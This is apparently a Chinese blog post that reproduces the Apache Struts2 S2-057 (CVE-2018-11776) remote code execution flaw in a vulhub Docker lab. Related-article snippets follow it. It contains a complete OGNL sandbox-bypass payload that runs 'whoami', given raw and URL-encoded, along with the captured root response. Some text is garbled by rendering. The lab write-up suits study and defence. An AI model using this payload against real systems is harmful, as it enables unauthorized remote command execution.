struts2-057-CVE-2018-11776

最新推荐文章于 2024-01-30 08:30:00 发布
最新推荐文章于 2024-01-30 08:30:00 发布
阅读量181 收藏 1
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43718688/article/details/114819653
版权

struts2-057-CVE-2018-11776

搭建环境

首先安装git
yum install git-core

安装完成之后运行一下git clone试试,如果出现选项就说明安装成功了。
之后安装docker
sudo yum -y install docker-ce

尝试运行一下
docker images

如果出现镜像列表则说明成功安装。接下来就需要安装vulhub了,在这之前,需要先安装pip
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
安装完成之后尝试输入pip,出现选项即说明安装成功,接下来就可以

使用pip来安装docker-compose
pip install docker-compose

直接从github上将vulhub拿下来
git clone https://github.com/vulhub/vulhub
可以看到里面的漏洞环境
在这里插入图片描述
进入struts2目录下,找到struts2-057,进去。
在这里插入图片描述
直接使用docker-compose将镜像安装起来。
docker-compose up -d
在这里插入图片描述
看下docker里面镜像库,如果出现struts2镜像则说明安装成功。
在这里插入图片描述
查看psid,复制id后直接启用环境。
docker exec -i -t /bin/bash
在这里插入图片描述

复现

环境就搭建起来了,访问一下ip:port/struts2-showcase/,ip是虚拟机地址,端口一般是8080
在这里插入图片描述
这里就访问成功了,之后验证漏洞,将url换成ip:port/struts2-showcase/${(111+111)}/actionChain1.action
在这里插入图片描述
最后可以看到已经变成了ip:port/struts2-showcase/222/register2.action
在这里插入图片描述

payload

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘whoami’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

URL编码之后:
/struts2-showcase/%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7d/actionChain1.action

通过抓包可以看到,第一次请求 ( 111 + 111 ) 的 时 候 , 返 回 了 302 响 应 码 , 随 即 返 回 想 要 得 到 的 内 容 {(111+111)}的时候,返回了302响应码,随即返回想要得到的内容 (111+111)302{222},并且响应码是200
在这里插入图片描述
用payload再次尝试,查看抓包,可以发现还是先响应302,然后返回了用户名root,并且响应码是200
在这里插入图片描述

沾了油的水子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞解析及复现(CVE-2018-11776)
zkaqlaoniao的博客
10-29 387
Struts2是一款基于Java开发的框架,web路径下会出现两种特殊的文件格式,即*.action文件与*.jsp文件;它是基于MVC设计模式的Web应用框架,相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。
作为武器的CVE-2018-11776:绕过Apache Struts 2.5.16 OGNL 沙箱
一个码农的笔记
11-22 3423
翻译自:https://lgtm.com/blog/apache_struts_CVE-2018-11776-exploit 翻译:聂心明 这篇文章我将介绍如何去构建CVE-2018-11776的利用链。首先我将介绍各种缓解措施,这些措施是Struts 安全团队为了限制OGNL 的能力而设置的,并且我也会介绍绕过这些措施的技术。我将重点介绍SecurityMemberAccess 类的一般改进,这...
Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)
ahhacker86的专栏
01-30 950
2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现
浅浅的博客
07-28 3096
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现 一、漏洞描述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 二、漏洞影响版本 Apache Strut...
struts2漏洞_Struts2-057漏洞从搭建到复现
weixin_39942785的博客
12-10 617
Free雅轩 合天智汇 漏洞描述2018年8月23日,ApacheStrust2发布最新安全公告,ApacheStruts2 存在远程代码执行的高危漏洞,该漏洞由SemmleSecurity Researchteam的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。...
struts2-057-exp
08-28
Struts2-057 EXP 是一个针对Apache Struts2框架的严重远程代码执行(RCE)漏洞,其CVE编号为CVE-2018-11776。这个漏洞影响了Struts2的多个版本,使得攻击者能够通过精心构造的HTTP请求在服务器端执行任意代码,从而...
Struts2-057漏洞检测python脚本
11-04
Struts2-057漏洞,也被称为CVE-2017-9805,是Apache Struts2框架中的一个严重安全漏洞。这个漏洞主要出现在Struts2的`Struts2 REST Plugin`中,允许远程攻击者通过恶意构建的HTTP请求头执行任意系统命令,从而对...
struts2-057扫描工具
08-27
Struts2-057,也被称为CVE-2016-1000031,是由于Struts2框架在处理动态方法调用时存在的问题。当用户提交的请求参数与Action Mapping的配置不匹配时,框架会尝试进行错误处理,而这个过程中可能引发未授权的远程代码...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
Struts2是一个非常流行的Java MVC框架,用于构建企业级Web应用程序。然而,它在历史上曾出现过多个安全漏洞,其中最著名的就是“Struts2漏洞”。这个标题和描述提到的"struts2-scan"是一种工具,专门用来检测Struts2...
struts-examples:Apache Struts的镜像
05-12
Struts示例 这个Maven多模块项目包含所有Struts 2示例应用程序,这些应用程序是Struts 2入门指南的一部分。 要构建所有示例应用程序,请运行Maven命令: mvn -e clean package 在项目的根文件夹中,Maven将构建每个模块,并在每个模块的目标子文件夹中创建一个.war文件。 然后,您可以将.war文件复制到Servlet容器中(例如Tomcat,Jetty,GlassFish等)。 每个模块中都有一个README文件,其中包含说明和查看该应用程序的URL。
struts:Apache Struts的镜像
02-03
Apache Struts Web框架 Apache Struts Web框架是用于创建Java Web应用程序的免费开源解决方案。 文献资料 可以在上找到更多信息。 请阅读《 ,然后可以浏览 。 有关Apache Struts使用的问题应张贴到。 描述 Web应用程序与常规网站的不同之处在于Web应用程序可以创建动态响应。 许多网站仅提供静态页面。 Web应用程序可以与数据库和业务逻辑引擎进行交互以自定义响应。 基于JavaServer Pages的Web应用程序有时会混合数据库代码,页面设计代码和控制流代码。 实际上,我们发现除非将这些关注点分开,否则较大的应用程序将变得难以维护。
struts-2.5-all.zip
05-26
struts-2.5-all.zip 最新 struts-2.5-all.zip 官网下载 官方 MD5 校验值:4d09dfb05792a02ede32806aabf2b11e
使用Docker搭建Struts2-048漏洞环境及Python PoC验证
Mi1k7ea
08-07 4483
这次是继续使用Docker搭建Struts2-048漏洞环境,并且利用PoC进行测试。 生成容器: 直接使用上次制好的镜像ubuntu_aliyun:1.0,直接生成容器: docker run -it -d --name struts2-048 -p 8088:8080 ubuntu_aliyun:1.0 注意点就是Tomcat的默认端口为8080,因而端口要映射到8080。
struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4551
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
Apache Struts CVE-2018-11776如何防止被利用
秋̶᭄ꦿ攻城狮࿆ྂ
08-16 224
Apache Struts CVE-2018-11776如何防止被利用 在上周三(8月22日),Apache软件基金会(也就是Apache Software Foundation,简称为ASF)发布了一份有关一个Apache Struts开源网页应用程序框架关键漏洞的安全公告。该公告指出,如果成功利用,被标识为CVE-2018-11776的漏洞可能允许远程执行代码。仅在一天之后,即2018年8月23日,一位Github ID为“jas502n”的研究人员就发布了针对此漏洞的概念验证(PoC)漏洞利用代码。
Struts2中一个远程代码执行漏洞(cve-2018-11776)修复之struts2版本2.1.8.1升级到2.3.35
weixin_35713959的博客
12-13 268
struts2版本2.1.8.1升级到2.3.35 由于是老项目采用的还是jar包直接下载拖上去的方式。 新项目可自行将依赖换成对应的版本。 原版本: 替换后新版本: 具体jar包下载地址可在如下地址中寻找: https://www.mvnjar.com/org.apache.struts/struts2-jasperreports-plugin/2.3.35/detail.html ...
struts2 S2-057(CVE-2018-11776)
Z_l123的博客
03-01 1151
漏洞介绍 该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行;url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 受影响版本 <=Struts2.3.34,Struts 2.5.16 漏洞复现 1.访问地址 http://ip:port/strut..
CVE-2018-20676
最新发布
06-14
CVE-2018-20676是一个安全漏洞标识符,它通常与Apache Struts2框架有关。Struts2是一个流行的开源Web应用程序框架,用于构建Java web应用。这个漏洞被称为“远程代码执行”(Remote Code Execution, RCE),意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值